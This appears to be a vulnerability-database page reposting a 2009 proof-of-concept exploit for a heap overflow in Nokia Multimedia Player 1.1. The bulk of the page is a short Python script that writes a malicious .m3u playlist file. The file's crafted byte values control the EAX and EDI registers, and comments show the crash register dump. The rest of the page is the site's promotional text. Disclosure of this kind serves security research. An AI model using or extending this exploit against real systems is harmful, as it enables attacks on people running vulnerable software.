Lucene search
K

Nokia Multimedia Player 1.1 Heap Overflow

🗓️ 03 Feb 2009 00:00:00Reported by 0inType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

Nokia Multimedia Player 1.1 Heap Overflow Po

Code
`# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit  
# by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl]  
# http://www.Dark-Coders.pl  
# Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me.. "to unicode.")  
# Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH  
# Nokia Multimedia Player is a element of Nokia PC Suite packet.  
# DOWNLOAD:http://europe.nokia.com/A4144905  
# Vuln:  
# This is heap overflow vuln, we can control EAX & EDI registers  
# (on my Windows XP sp3) with UNICODE chars...  
# DEBUG:  
# "Access violation when reading [00130013]"   
# EAX 00130013 <- !   
# EDX 00000000  
# EBX 00970000  
# ESP 0012F96C  
# EBP 0012FB8C  
# ESI 00AD26B0  
# EDI 00900011 <- !   
# EIP 7C910CB0 ntdll.7C910CB0  
#!/usr/bin/python  
eax="\x13\x13" # eax : 00130013  
edi="\x11\x90" # edi : 00900011  
buf="F"*261  
buf+=edi+eax  
buf+="B"*235  
file_name="spl0.m3u"  
ce=buf  
f=open(file_name,'w')  
f.write(ce)  
f.close()  
print 'PoC created!'  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Feb 2009 00:00Current
0.6Low risk
Vulners AI Score0.6
13